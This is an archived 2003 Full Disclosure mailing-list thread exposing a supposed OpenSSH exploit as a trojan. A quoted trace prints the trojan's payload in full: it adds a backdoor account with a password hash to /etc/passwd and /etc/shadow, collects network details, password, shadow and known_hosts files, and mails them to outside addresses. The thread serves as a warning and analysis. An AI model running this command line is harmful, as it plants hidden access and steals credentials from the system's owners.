Full Disclosure mailing list archives
Re: new openssh exploit in the wild! * is FAKE AS SH@!*
From: Vitaly Osipov <vosipov () tpg com au>
Date: Fri, 19 Sep 2003 15:28:29 +1000
This means that the original poster (gordon last) made it up himself, because he is saying :
i looked at this piece of exploit... it is binary so i'am not sure if this is a trojan or a backdoor or a virus. but i can't see anything strange while sniffing the exploit traffic. and i got root on serveral of my openbsd boxes with that. the bruteforcer seems to be very good.
which is obviously not true. Btw as far as I understand, the troyan code is triggered when the "exploit" is run with the offset specified, and not in a "bruteforcing" mode. W.
I'll confirm that it does this
The script actually opens a socket and connects to the target sshd but does nothing with that connection.
It also takes a pretty deep look into /proc/net looking for other networks attached to the device it is run from....
chris
On Fri, 2003-09-19 at 20:02, KF wrote:printf("[*] sending shellcode\n")= 22 popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp | /usr/sbin/sendmail -f ownage_at_gmx.de m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 0x0804a6b0 -KF gordon last wrote:hi readers, while i was staying idle in an so called 0day release channel on one irc network some scriptkiddies were talking about an new 0day release. in my backlog i can see the following: ---cut 08:09 [R4lph] *** r3t0r (r4lph_at_xxx) has joined channel #0dayz 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/ ---cut i looked at this piece of exploit... it is binary so i'am not sure if this is a trojan or a backdoor or a virus. but i can't see anything strange while sniffing the exploit traffic. and i got root on serveral of my openbsd boxes with that. the bruteforcer seems to be very good. i too looked at "strings theosshucksass" and found nothing suspicious. this exploit seems to be in the wild (underground) since beginning of august. thats quite a long time i hope most admins are patching the systems now... because the exploit is getting round faster and faster. if anyone can reverse engineer this piece it would be great if he posts his resulsts on his list because iam really intressted on the exploiting technique used for that bug. i cant get an idea on how to exploit this. hmm... regards, glast
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: new openssh exploit in the wild! * is FAKE AS SH@!* Vitaly Osipov (Sep 18)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Lars Olsson (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* christopher neitzert (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Raymond Dijkxhoorn (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Adam Balogh (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* Adam Balogh (Sep 19)
- RE: Re: new openssh exploit in the wild! *isFAKE AS SH@!* Chris Eagle (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Lars Olsson (Sep 19)